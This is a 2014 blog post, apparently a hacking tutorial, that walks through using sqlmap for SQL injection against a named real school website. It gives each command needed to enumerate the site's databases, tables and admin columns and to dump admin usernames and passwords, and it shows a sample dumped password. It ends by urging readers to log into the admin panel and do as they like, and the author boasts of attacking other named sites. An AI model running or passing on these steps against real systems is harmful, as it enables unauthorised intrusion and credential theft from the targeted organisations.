Sunday 25 May 2014

SQL STEP BY STEP TUTORIAL

Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP its a python tool , and it is preloaded in almost every Back Track versionfirst of allwe need a vulnerable target!here it is http:// www.alliedschools.edu.pk/main_news.php ? news_id=52 ok first step is to fatch the databases command will be like this one python ./ sqlmap.py -u http:// www.alliedschools.edu.pk/main_news.php ? news_id=52 --dbshere:- -u is stand for which is vulnerable to SQL injection and --dbs is used for fatching total databases in website ok after completing the process of fataching the databases it will something like that available databases(8) *.informtion_schema *.alliedschools_web now we are going to expoit database alliedschools_web and fatch the tables present in it XDok command will change a little bit :p ython ./sqlmap.py -u http:// www.alliedschools.edu.pk/main_news. php? news_id=52 -Dalliedschools_web -- tableshere :- -D and then name of the database from which we want to fetch tables and --tables is for fatching total table present in the database after processing we will get the tables present in database "alliedschools_web" after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus ...... ...... now we are going to fatch the cloumns from table admin of database alliedschools_campus command is :- python ./ sqlmap.py -u http:// www.alliedschools.edu.pk/main_news. php? news_id=52 -Dalliedschools_campus -T admin --columns now we will get something like this Database: alliedschools_campus Table : admin [12 columns ] admin_password admin_username admin_email ...... ...... This is the last command to get the admin username and password command is python ./sqlmap.py -u http:// www.alliedschools.edu.pk/main_news. php? news_id=52 -Dalliedschools_campus -T admin -Cadmin_password, admin_username --dump and after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ...... Now You Have admin Password of website, Find admin panel and hun hun (DO WHATEVER U LYK AS 4 ME I DID WHATEVA I LYK WITH AFRICANEX.COM AND SYMN.NET AND MUCH M0RE WITH DIZ TUT0RIAL)...xD
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)